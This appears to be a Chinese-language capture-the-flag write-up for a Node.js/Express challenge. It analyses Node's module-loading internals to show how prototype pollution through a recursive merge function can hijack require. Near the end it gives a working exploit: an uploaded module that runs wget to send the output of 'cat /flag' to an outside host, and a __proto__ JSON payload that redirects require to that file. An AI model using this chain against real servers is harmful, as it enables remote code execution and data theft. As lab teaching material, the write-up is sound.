打开题目
源码
server.js
const express = require("express");
const path = require("path");
const fs = require("fs");
const multer = require("multer");
const PORT = process.env.port || 3000
const app = express();
global = "global"
app.listen(PORT, () => {
console.log(`listen at ${PORT}`);
});
function merge(target, source) {
for (let key in source) {
if (key in source && key in target) {
merge(target[key], source[key])
} else {
target[key] = source[key]
}
}
}
let objMulter = multer({ dest: "./upload" });
app.use(objMulter.any());
app.use(express.static("./public"));
app.post("/upload", (req, res) => {
try{
let oldName = req.files[0].path;
let newName = req.files[0].path + path.parse(req.files[0].originalname).ext;
fs.renameSync(oldName, newName);
res.send({
err: 0,
url:
"./upload/" +
req.files[0].filename +
path.parse(req.files[0].originalname).ext
});
}
catch(error){
res.send(require('./err.js').getRandomErr())
}
});
app.post('/pollution', require('body-parser').json(), (req, res) => {
let data = {};
try{
merge(data, req.body);
res.send('Register successfully!tql')
require('./err.js').getRandomErr()
}
catch(error){
res.send(require('./err.js').getRandomErr())
}
})题目是express框架,首先给了merge函数可以用来原型链污染;/upload路由下对上传的文件重命名,返回json格式数据包括上传路径;/pollution路由下,首先进行merge函数污染,然后require导入err.js模块的getRandomErr()函数
err.js
obj={
errDict: [
'发生肾么事了!!!发生肾么事了!!!',
'随意污染靶机会寄的,建议先本地测',
'李在干神魔👹',
'真寄了就重开把',
],
getRandomErr:() => {
return obj.errDict[Math.floor(Math.random() * 4)]
}
}
module.exports = objgetRandomErr()函数会从 errDict 数组中随机选择一个元素返回值
思路很简单就是原型链污染,不过本题的污染方式要从nodejs的load.js模块分析
原型链污染 源码分析
源码链接
首先找到trySelf函数
const { data: pkg, path: pkgPath } = readPackageScope(parentPath) || {};
if (!pkg || pkg.exports === undefined) return false;
if (typeof pkg.name !== 'string') return false;调用 readPackageScope 函数,传递 parentPath 作为参数,并将返回值解构赋值给 pkg 和 pkgPath。如果 readPackageScope 返回 undefined,则将 {} 赋值给 pkg 和 pkgPath;两个if语句对pkg进行判断
继续追踪到readPackageScope函数
function readPackageScope(checkPath) {
const rootSeparatorIndex = StringPrototypeIndexOf(checkPath, sep);
let separatorIndex;
do {
separatorIndex = StringPrototypeLastIndexOf(checkPath, sep);
checkPath = StringPrototypeSlice(checkPath, 0, separatorIndex);
if (StringPrototypeEndsWith(checkPath, sep + 'node_modules'))
return false;
const pjson = readPackage(checkPath + sep);
if (pjson) return {
data: pjson,
path: checkPath,
};
} while (separatorIndex > rootSeparatorIndex);
return false;
}遍历路径去找node_modules文件并尝试读取该路径下的package.json文件。如果找到了package.json文件,函数将返回一个包含data和path属性的对象
继续追踪readPackage函数
function readPackage(requestPath) {
const jsonPath = path.resolve(requestPath, 'package.json');
const existing = packageJsonCache.get(jsonPath);
if (existing !== undefined) return existing;
const result = packageJsonReader.read(jsonPath);
const json = result.containsKeys === false ? '{}' : result.string;
if (json === undefined) {
packageJsonCache.set(jsonPath, false);
return false;
}就是读取package.json文件
回到题目,我们可以尝试污染模块err.js中的getRandomErr()函数,然后再调用的时候即可实现rce
总结来说,在require非原生库的过程中,最终会去调用PkgPath和pkg.exports拼接起来的字符串所指定的文件
exp
obj={
getRandomErr:() => {
require('child_process').execSync('wget https://5i781963p2.yicp.fun:443/`cat /flag`')
}
}
module.exports=obj上传成功后,再原型链污染即可
{
"__proto__": {
"data": {
"name": "./err.js",
"exports": "./fa85d80f53972a819dd7ebd3db7f4efa.js"
},
"path": "/app/upload"
}
}